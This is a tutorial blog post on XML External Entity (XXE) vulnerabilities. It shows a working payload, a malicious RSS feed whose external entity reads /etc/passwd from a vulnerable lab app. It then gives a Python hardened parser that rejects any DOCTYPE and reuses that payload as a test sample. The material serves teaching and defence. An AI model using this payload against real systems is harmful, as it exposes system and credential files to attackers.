XML External Entity (XXE) Vulnerability - Part 2 (XXE Basics)




In part one of this XXE series, we learned some basics of XML. In this second part, we will learn the basic concept of XXE: what XXE is, and a basic example of XXE.


First, we will learn what XXE is.


XML External Entity (XXE) is a vulnerability that can be exploited in applications that use an XML parser to interpret XML documents. An attacker can inject malicious code into the XML document to access external entities, scan the internal system, cause a Denial of Service (DoS), or launch other attacks.

Due to a misconfiguration in the XML parser, the parser resolves the reference to the external entity present in the XML document and processes its contents.


Let's see a basic example of an XXE vulnerability.


In this example, we will learn how to extract sensitive files such as /etc/passwd or /etc/hosts by exploiting XXE.

I have a vulnerable web application that takes an RSS feed as input and parses it using an XML parser.







Now I will create an RSS feed XML document that contains the malicious code to read the /etc/passwd file, and host that file on an HTTP server, because the vulnerable web application only accepts a URL.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<feed>
        <title>Malicious RSS</title>
        <description>This is a Malicious RSS File</description>
        <entry>
                <title>Sensitive Data</title>
                <link href="http://example.com"></link>
                <content>&xxe;</content>
        </entry>
</feed>

In the above payload, the first line is the XML prolog. Then we define the DTD, in which we declare the external entity xxe; wherever &xxe; is referenced, here inside the content tag, the parser will include the /etc/passwd file.








So, as you can see, the XML parser displays the contents of the /etc/passwd file.
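The fix on the application side is to stop the parser from ever processing a DTD, since the DTD is the only place an entity like xxe can be declared. The following is an added example (not code from the original post or from the vulnerable application) that does exactly that with the Python standard library: it refuses any document carrying a DOCTYPE before parsing the feed, and never resolves external entities. The feed shape (feed, title, entry, link href, content) follows the payload above; the benign feed is a constructed sample.

```python
"""
Hardened feed parsing that refuses DTDs before any entity can be resolved.

Added example (not from the original post). Assumes a feed with the same
shape as the post's RSS payload: <feed><title/><entry><title/><link href/>
<content/></entry></feed>. Uses only the standard library.
"""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(Exception):
    """Raised when untrusted XML carries a DOCTYPE (the only place entities are declared)."""


def _on_doctype(name, sysid, pubid, has_internal_subset):
    # Fires as soon as expat sees <!DOCTYPE ...>, before any <!ENTITY ...> inside it
    # is processed and long before a reference such as &xxe; could be expanded.
    raise UnsafeXML(f"DOCTYPE {name!r} rejected: DTDs are disabled for untrusted input")


def has_dtd(xml_bytes: bytes) -> bool:
    """Return True if the document declares a DTD, without expanding anything."""
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _on_doctype
    # Belt and braces: never fetch external parameter entities either.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    try:
        parser.Parse(xml_bytes, True)
    except UnsafeXML:
        return True
    return False


def parse_feed(xml_bytes: bytes) -> dict:
    """Parse a feed only after confirming it carries no DTD; raise UnsafeXML otherwise."""
    if has_dtd(xml_bytes):
        raise UnsafeXML("feed rejected: DOCTYPE present")
    # Only DTD-free documents reach ElementTree, so there is nothing to expand.
    root = ET.fromstring(xml_bytes)
    entries = []
    for entry in root.iter("entry"):
        link = entry.find("link")
        entries.append({
            "title": entry.findtext("title", default=""),
            "link": link.get("href", "") if link is not None else "",
            "content": entry.findtext("content", default=""),
        })
    return {"title": root.findtext("title", default=""), "entries": entries}


def is_rejected(xml_bytes: bytes) -> bool:
    """Convenience wrapper: did the hardened parser refuse this document?"""
    try:
        parse_feed(xml_bytes)
    except UnsafeXML:
        return True
    return False


# Constructed sample inputs: the post's payload, and a benign feed of the same shape.
MALICIOUS_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<feed>
  <title>Malicious RSS</title>
  <entry>
    <title>Sensitive Data</title>
    <link href="http://example.com"></link>
    <content>&xxe;</content>
  </entry>
</feed>"""

BENIGN_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<feed>
  <title>Benign RSS</title>
  <entry>
    <title>Hello</title>
    <link href="http://example.com"></link>
    <content>plain text only</content>
  </entry>
</feed>"""

if __name__ == "__main__":
    print("malicious rejected:", is_rejected(MALICIOUS_FEED))  # True
    print("benign parsed:", parse_feed(BENIGN_FEED))
```

Rejecting the whole DOCTYPE is deliberate: an allow-list of "safe" entity declarations is hard to get right, whereas a feed has no legitimate need for a DTD at all, so a single early check removes the entire class of attack shown above.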

Sahil Gupta

Application Security | DevSecOps | Secure SDLC | Penetration Tester (Web and API) | CEHv10 | IBM Certified Cybersecurity Analyst Professional
